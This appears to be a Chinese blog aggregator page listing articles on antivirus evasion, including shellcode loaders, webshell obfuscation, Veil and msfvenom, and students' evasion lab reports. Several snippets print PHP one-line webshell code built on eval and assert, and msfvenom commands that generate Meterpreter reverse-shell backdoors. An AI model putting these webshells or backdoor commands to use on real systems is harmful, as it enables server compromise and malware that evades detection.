veil免杀第15页

【免杀篇】远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C#加载shellcode免杀介绍0x02C#源码直接编译exe方法1：C#+shellcode直接编译(VT免杀率20/71)方法2：C#

Agan '·2020-06-21 21:12

【免杀】————5、过D盾webshell分享

0x00前言最近在测试过程中遇到了D盾，悲催的发现所有过D盾的webshell都被查杀了。因此就在网上搜索了一些之前可以过D盾的shell，然后将其做了一些变形（有一些shell没有更改），使其可以过D盾。本次一共奉献上9个可过D盾的shell，全部亲测可过。0x01extract变量覆盖过D盾0x02parse_str变量覆盖过D盾0x03__destruct析构函数过D盾name");}}$u

FLy_鹏程万里·2020-06-21 20:37

Kali Linux渗透测试——免杀基础

笔记内容参考安全牛课堂苑房弘老师的KaliLinux渗透测试教程文章目录一、基础概念（一）恶意软件（二）防护手段（三）免杀技术二、工具介绍（一）Msfvenom（二）Veil-evasion（三）Backdoor-factory

Captain_RB·2020-06-21 18:38

免杀之HackTheWorld与Shecodject

生成一个msf免杀payload：首先设置payload类型：其中LHOST可以使用ngrok内网映射工具，将本地kali反射到公网。LPORT是通过ngrok进行反射时分配的端口。

csdnPM250·2020-06-21 18:00

php一句话木马的老生常谈，可过D盾，安全狗

首先下面这个马很简单，只用了一个变量覆盖，所以，不出所料被杀了$b=$_POST['x'];$a='b';@assert($$a);马被杀了那肯定要想办法免杀，我们试试把assert分开呢？$b=$_

逝之君·2020-06-21 15:12

易语言大漠多线程模块制作及多线程调用实战

首先是多线程模块的多种制作方法和调用方法，其次每种多线程模块都实现免注册到系统调用，和免杀软的查杀，更重要的是示范了多种多线程模块的调用方法。

511遇见·2020-06-21 15:52

一句话木马的套路

0×01前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧。

whatday·2020-06-21 14:00

免杀powershell 绕过杀软

免杀powershell绕过小白看了各种大佬做的免杀文章感觉太神奇了，于是自己也做了一个………….有点low，Don'tlaughatme！

F1_bd2c·2020-06-21 13:38

分享一些无特征PHP一句话

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。

weixin_34179968·2020-06-21 11:10

利用随机异或无限免杀d盾 ——yzddMr6

前言最近D盾更新了,在某司某圈也看到了不少免杀d盾免杀狗的一句话帖子但是基本上只要放出来不到两天时间就加入查杀全家桶.最近一直在造各种车轮子就想着其实可以写个脚本利用异或来fuzz出指定的字符然后拼接出

yzddMr6·2020-06-21 10:08

一句话木马变种免杀

常见的免杀方式：字符串拼接多方式传参免杀回调函数远程木马伪协议后门函数特性字符串拼接免杀：多传参免杀：$value){if($key=='assert'){$key($_POST['s'];)}}?

南人旧心1906·2020-06-21 06:51

在freebuff看到的一个PHP webshell(免杀)感想

此文章只进行交流学习，请合法理性学习我们先看一下这个神奇的webshell免杀源码首先我们需要一本PHP手册来辅助我们参考学习手册链接在以往的博客中有或者置顶的群文件中也有。

丶喝咖啡的猫·2020-06-21 05:01

那些shellcode免杀总结

首发先知:https://xz.aliyun.com/t/7170自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。

卿's Blog·2020-06-21 04:17

一句话木马及几种可绕过过滤格式

ASP一句话1.2.3.免杀大部分网站的一句话4.绕过部分网站过滤的一句话5.executerequest("YouPass")绕过部分网站过滤双引号的一句话6.php一句话7.

god_7z1·2020-06-21 01:53

纯符号一句话webshell PHP代码详解

以上是网上流传的一段由纯符号组成的一句话后门代码，这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。

abcd9com·2020-06-20 23:25

PHP一句话木马Webshell变形免杀总结

0×00前言大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖.0×01字符串上的舞蹈一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下:@eval($_POST[xxxxx]);很明显的eval会成

weixin_30559481·2020-06-20 21:29

史上最全的一句话木马

一句话免杀：一：变形法支持变异菜刀连接以过安全狗,过啊D文件扫描的一句话ASPASPASPX大家伙把你们手中好的发出来共享下吧别藏着了PHP//可执行命

V·2020-06-20 21:25

PHP一句话木马使用技巧

hackbar命令提示符：curl首先上传一句话木马到网站目录，可以是虚拟机也可以是VPS，我这里用的是阿里云我自己搭建的网站，由于只是简单的一句话木马，因次一上车就收到了安全云的短信安全提示，正好可以用来测试免杀一句话

shy014·2020-06-20 21:14

shellcode 免杀(一)

工具免杀选择了几个简单或者近期还有更新的免杀工具进行学习ShellcodeWrapper项目地址https://github.com/Arno0x/ShellcodeWrapper该工具的原理是使用异或加密或者

sijidou·2020-06-19 19:00

深究异或webshell原理以及服务器处理免杀的流程

深究异或webshell原理以及服务器处理免杀的流程前言首发合天之前一直接触rce；但是总是可以看到过滤就可以考虑无数字和字母的webshell或者免杀马，但是今天碰到一道题，让我深刻理解了深究的重要性

s1mple-safety·2020-06-18 23:00

exe转换shellcode

前言前些天听到团队在问有没有exe转换成shellcode的工具，然后拿来做免杀，然后我就突发奇想的一个念头。那既然找不到脚本为啥不自己去开发一个呢！！！

nice_0e3·2020-06-08 00:00

webshell脚本的免杀(二)

脚本木马的免杀Web端木马一般是中国菜刀的一句话木马、中国蚁剑马、冰蝎马、还有各种各样脚本的大马。Web端木马的查杀一般是WAF通过分析流量来进行截断。

谢公子·2020-05-28 10:00

MSF木马的免杀(三)

目录MSF木马的免杀MSF木马的免杀MSF下输入，生成免杀shellcodemsfvenom-pwindows/meterpreter/reverse_tcp-ax86--platformwindowsLHOST

谢公子·2020-05-26 09:30

[每日干货]:分享一个ctf及平时都可用到的一个在线php审计的工具

每日干货:https://phpchip.com/CHIP挖掘所有PHP动态特性个人感觉和seay审计差不多不过PHPchip也算是另一种方法叭当我上传一个PHP一句话马文件(免杀)的时候：先附上代码:

shadowwolf·2020-05-23 17:00

渗透利器-kali工具 (第五章-6) Metasploit后门生成模块

本文内容：免杀技术发展史杀软原理简介后门生成常用命令常见生成后门模式从后门生成模块到权限维持：免杀技术发展史：理论上讲，免杀一定是出现在杀毒软件之后的。

醋成酒的小墨·2020-05-22 21:00

kali 免杀工具shellter安装以及使用

俗称为免杀官网：https://www.shellterproject.com/目前最新版本是7.2，主程序是.exe文件所以在windows下可以直接使用，在linux上运行的话就需要安装wine环境来运行

We3sT·2020-05-18 21:00

metasploit payload运行原理浅析(sockedi调用约定是什么)

背景最近在做一些msf相关的事情，今天听到免杀相关的，去查询了下相关资料。

Akkuman·2020-05-09 17:00

关于免杀的实践

流行的杀毒软件如Kaspersky,360等已经在系统层对文件的活动进行了监测，对于流行的病毒只要一经发现，必然会及时遏止病毒的传播。一种流行的Nanocore在植入时就先检测杀毒软件的运行情况，在病毒生成之前先关闭Avast,WindowsDefender等杀毒产品，进而运行可执行文件。对于普通用户来说，不安装杀毒软件就是恶梦。如果没有杀毒软件对系统层的可疑活动进行监测，病毒植入的成功率会大大提

失控的比特·2020-04-23 23:00

exe文件，后门免杀的制作学习笔记

引用原文！！注：本文技术非原创，转载请直接对原文转载，请不要对本文打赏等，本文为学习笔记，禁止由本文产生任何盈利行为。需要（Framework），一般Windows环境都有，C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exemsfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.1.108

一点也不想吃辣·2020-04-13 19:18

webshell-venom 3.2 :免杀D盾无压力 ——yzddMr6

前言感谢大家对webshell-venom的支持星球自开启以来已经源源不断有各路大佬加入并且一起交流了很多的思路跟想法为了不辜负大家的期望自己这几天一大早上就起来写脚本发文章，基本上星球里都是一天两更项目在今天也达到了700个星image所以特地推出webshell-venom3.2版本webshell-venom3.2的蚁剑插件版也已经在蚁剑商店上市image原来已经有的点击更新即可3.2是gi

yzddMr6·2020-04-12 21:36

渗透师的工作

（国内渗透的现状）渗透测试包含：web渗透，app渗透，app逆向，代码审计,逻辑漏洞，木马dll免杀。手工脱壳

零碎小雷·2020-04-10 00:17

20171113曾英特《免杀原理与实践》实验报告

可以发现，由于实验2中是直接用shellcode代码生成的exe文件，没有做免杀处理，所以基于特征库的检测就能检测出来。

20171113曾英特·2020-04-09 00:00

2019-2020-2 20175127丁新宇《网络对抗技术》Exp3 免杀原理与实践

Exp3免杀原理与实践一、实验内容1、方法正确使用msf编码器msfvenom生成如jar之类的其他文件veil加壳工具使用C+shellcode编程使用其他课堂未介绍方法2、通过组合应用各种技术实现恶意代码免杀

sunsay·2020-04-08 21:21

20171213英语复盘日志

1，从本篇文章／音频／视频中我学到的最重要的概念:结婚是人生中的一件大事，必须得慎重的对待，好好筹划2，我在本片文章／音频／视频中学到的怦然心动的单词:veil婚纱weddingring婚戒bride新娘

115尹江凤·2020-04-08 07:22

免杀进阶

201753142020-4《网络对抗技术》Exp3Plus免杀进阶Week7目录201753142020-4《网络对抗技术》Exp3Plus免杀进阶Week7一、实践内容二、基础知识安装必要软件包TheFatRatClamav

20175314薛勐·2020-04-06 17:00

E语言免杀之易语言程序永久去除_EL_HideOwner

大家可以用PCHunter查看下,任何程序,包括无窗口的程序,易语言都会创建个隐藏的窗口,类名为_EL_HideOwner而且这个窗口启动的优先级非常高,在_启动子程序之前就创建了,我想动态hook下改成别的类名都不行现在有很多软件是通过查找这个类名判断为E语言程序来当作歪G进行封停的.真是蛋疼，所以我们可以通过下面的方法量名类型静态数组备注局_xx字节集局_位置整数型局_窗口句柄整数型krnln

rabbit8·2020-04-06 16:52

parrot安装Veil框架

parrot安装Veil框架kaliveilinstallenterthefollowingcodeapt-yinstallveil/usr/share/veil/config/setup.sh--force

Enomothem·2020-04-06 16:03

2019-2020-2 20175335 丹增罗布《网络对抗技术》Exp3 免杀原理与实践

2019-2020-220175335丹增罗布《网络对抗技术》Exp3免杀原理与实践一、实验目标了解恶意软件检测机制。学会使用msf、veil、加壳工具、C+shellcode等方法实现部分免杀。

20175335·2020-04-05 17:00

2019-2020-2 20175222 罗雨石《网络对抗技术》Exp3 免杀原理与实践

基于行为的恶意软件检测：在启发式基础上对软件行为进行监控2.免杀是做什么？对恶意软件做一些处理，使它不被杀毒软件所检测出来3.免杀的基本方法有哪些？改变特征码

20175222罗雨石·2020-04-05 13:00

20175328 Exp3 免杀原理与实践

目录一、实验原理（一）杀软原理（二）免杀原理二、基础问题回答（一）杀软是如何检测出恶意代码的？（二）免杀是做什么的？（三）免杀的基本方法有哪些？

20175328李欣颖·2020-04-04 09:00

2019-2020-2 20175105王鑫浩《网络对抗技术》Exp3 免杀原理与实践

2019-2020-220175105王鑫浩《网络对抗技术》Exp3免杀原理与实践实验步骤1.正确使用msf编码器1.输入如下的代码，生成exp3.exe文件，对后门程序进行编码msfvenom-pwindows

20175105鑫浩·2020-04-04 08:00

2019-2020-2 20175321吴丁成《网络对抗技术》Exp3 免杀原理与实践

目录2019-2020-220175321吴丁成《网络对抗技术》Exp3免杀原理与实践一、实践目标二、基础知识三、实验内容1.正确使用免杀工具或技巧1.1正确使用msf编码器1.2msfvenom生成如

20175321wdc·2020-04-04 04:00

2019-2020-2 网络对抗技术 20172327 Exp3 免杀原理与实践

目录1.实践基础1.1什么是恶意代码检测机制和免杀原理？

可爱的坏人·2020-04-04 03:00

2019-2020-2 20175305张天钰《网络对抗技术》 Exp3 免杀原理与实践

2019-2020-2《网络对抗技术》Exp3免杀原理与实践一.知识小结免杀概念一般是对恶意软件做处理，让它不被杀毒软件所检测。基础问题回答杀软是如何检测出恶意代码的？

20175305张天钰·2020-04-04 02:00

2019-2020-2 网络对抗技术 20175206李得琛 Exp3 免杀原理与实践

目录实践内容实践过程任务一：正确使用msf编码器任务二：msfvenom生成如jar之类的其他文件任务三：veil任务四：加壳工具任务五：使用Cshellcode编程任务六：使用其他课堂未介绍方法任务七

20175206李得琛·2020-04-04 01:00

2019-2020-2 20175316盛茂淞《网络对抗技术》Exp3 免杀原理与实践

2019-2020-220175316盛茂淞《网络对抗技术》Exp3免杀原理与实践一、实验目标熟悉后门的概念使用netcat实现win,linux之间的后门连接掌握meterpreter的应用了解MSFPOST

20175316盛茂淞·2020-04-04 01:00

2019-2020-2 20174314王方正《网络对抗技术》Exp3 免杀原理与实践

一、实验概述1.1实验目标理解免杀原理。通过实践掌握免杀各种基本方法。

20174314王方正·2020-04-04 01:00

20175323 Exp3 免杀原理与实践

exp3免杀原理与实践1.1.基础问题回答（1）杀软是如何检测出恶意代码的？

20175323鞠欣余·2020-04-04 00:00

Exp3 免杀原理与实践

又是一年清明节，在此向因新冠肺炎不幸离世的人们表示哀悼，向全世界奋战在抗疫一线的逆行者们致敬，人类因为你们而延续！让我们携起手来，战胜疫情！写在前面为了方便记忆，我把所有的后门程序通过nc传过来之后依序命了名，看着一排后门软件挺让人放心的（？）可我现在只能凭着顺序猜各自的来源了，截图也只剩下各种火绒记录。下图为后门程序排排坐吃火锅：）实验总结与体会实践总结本次实验中，我们简单实践了各类恶意代码操作

PeterDon·2020-04-04 00:00

推荐频道

veil免杀